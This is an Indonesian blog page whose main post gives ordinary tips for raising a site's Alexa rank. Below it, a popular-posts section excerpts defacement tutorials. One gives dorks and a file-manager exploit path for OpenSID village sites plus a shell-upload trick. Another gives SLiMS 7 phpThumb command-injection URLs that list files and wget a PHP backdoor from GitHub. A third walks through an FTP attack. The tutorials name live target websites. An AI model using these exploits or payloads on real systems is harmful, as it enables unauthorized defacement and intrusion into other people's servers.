Langsung ke konten utama

Cara Meningkatkan Ranking Alexa Dengan Cepat

 

Alexa adalah salah satu perusahaan analisis website terbaik di Internet. Jika Anda melakukan bisnis online, maka alexa rank sangat penting karena menyangkut tingkat kepercayaan suatu web/blog.

Alexa rank memainkan peran utama jika Anda berencana untuk menjual spot iklan di website atau blog. Pengiklan menggunakan Alexa rank untuk menentukan popularitas, Lalu Lintas dan jangkauan blog / website. Sebuah blog yang lebih baik peringkat alexanya pasti akan memiliki trafik yang baik dan tingkat konversi iklan yang lebih tinggi.

Berikut Cara Meningkatkan Ranking Alexa Dengan Cepat:

Pertama: Kualitas Konten

Alexa akan mempertimbangkan tampilan halaman, tingkat bouncing dan waktu yang dihabiskan oleh pengunjung untuk melakukan perangkingan. Konten yang unik dan segar akan membuat pengunjung berlama-lama diwebsite anda sehingga mampu meningkatkan ranking di alexa.

Kedua: Jangan Mengkopi Artikel di Web/Blog Lain

Dengan menyalin artikel dari web/blog lain tanpa modifikasi sedikitpun akan mampu menurunnkan ranking anda di alexa. Sebagian pengunjung yang tahu akan artikel tersebut akan enggan untuk mendatangi web/blog anda dan mungkin akan memberikan komentar negatif terhadap artikel yang anda kopi.

Ketiga: Aktif di Media Social

Media social memiliki kecenderungan untuk mendorong pengunjung agar membuka suatu web/blog. Share artikel anda di Facebook, Twitter maupun Google plus agar user ketika membuka media social akan mengetahui posting anda dan kemungkinan membuka link tersebut.

Keempat: Frekuensi Update Konten

Cara yang paling bagus adalah dengan selalu mengupdate web/blog anda. Sebuah studi menunjukkan bahwa update blog/web 7 – 10 / minggu akan meningkatkan ranking alexa secara signifikan. Jika anda posting banyak artikel dalam satu hari atau satu minggu akan juga meningkatkan indeks pencarian oleh mesin pencari. Rumusnya:

Banyak Posting = Banyak Pencarian yg Keluar = Banyak Trafik = ↑ Alexa Rank

Kelima: Posting Ke Web/Blog Lain

Cara ini cukup efektif untuk meningkatkan ranking di alexa. Lakukan posting pada web/blog yang memiliki Pagerank yg bagus atau ranking alexa yang baik.

Komentar

Postingan populer dari blog ini

Deface Poc RFM OpenSID

Dork: "OpenSID Tangerang"            "OpenSID Bandung"            "Desa SID site:"           Exploit: /assets/filemanager/dialog.php?akey=GantiKunciDesa Dorking Dulu Lah Kalianya Nih Live Target : http://kalidengen-kulonprogo.desa.id http://pantaigading.opendesa.id/ Tambahkan Exploitnya..... Terus ntar ada tuh Rfm atau Responsif FileManager Kalian Upload Mini Shell / Uploader Kalian Kalau bisa Rename Jadi format.txt misalnya (shell.php<?.txt) nah itu ntar itu pasti langsung berubah jadi format php...txtnya dah keinject ama <? Nih Comot Mini Uploader Buat Up Shell //Powered By Mr.Colded X Mr.Cold// //Team : 3RROR YOUR SYSTEM // <title>./CryMera - FR13NDS CYBER ARMY </title><center> <body bgcolor= "black" >     <br><br><br><br>     <br>     <font color= "lime" size= "5" >> ./CryMera <</font> <font color= "r

Slims Command Injection

 Slims 7 PhpThumb Command Injection Dork : Powered By SLIMS 7 (Cendana)  inurl:/index.php?p=show_detail&id= "Detail Cantuman" site:ac.id "Powered By Slims7" site:ac.id ~~~~ Check Vuln (command injected) : /lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;ls -la;%20&phpThumbDebug=9 Upload shell : /lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;wget%20https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/php/mini.php;%20&phpThumbDebug=9 File access : /lib/watermark/shell.php References : https://www.bandung6etar.my.id/2020/09/deface-cms-slims-command-injection.html

Deface poc Ftp Server Attack

Assalamualaikum wr.wb Bagaimana kabar saudara sekalian?? Baik pasti nya yaa Oke di tutorial deface ini saya mau membagikan poc ftp server attack Yang dimana si hacker mengakses data data penting di ftp web tersebut Ada beberapa teknik si hacker mendapatkan akses ke ftp web, Salah satu nya di brute force yaitu mencari password default dari domain web nya Oke dah langsung aja ke tutorialnya Gosah banyak cingcong gosah banyak bacot kalo kata lider kami si padang :v Bahan-bahan : - Dork > intitle:"index of" sftp-config.json            > intitle:"index of" ftpsync.settings - Apk ftp - Shell backdoor, kalo lu gakda shell cek aja di blog ini,, minishell backdoor ~ power f ~ akun pebeh  Gass bewan awp di burning hall :v Oke gesss +Pertama kita buka Apeka ep te pe nya terlebih dahulu eaaa, Live target gue => http://vakantievillacalpedylano.be +Yang kedua kalian pastikan ada akun ftp di web target, +Ketiga kalian masukan host,port,user passwor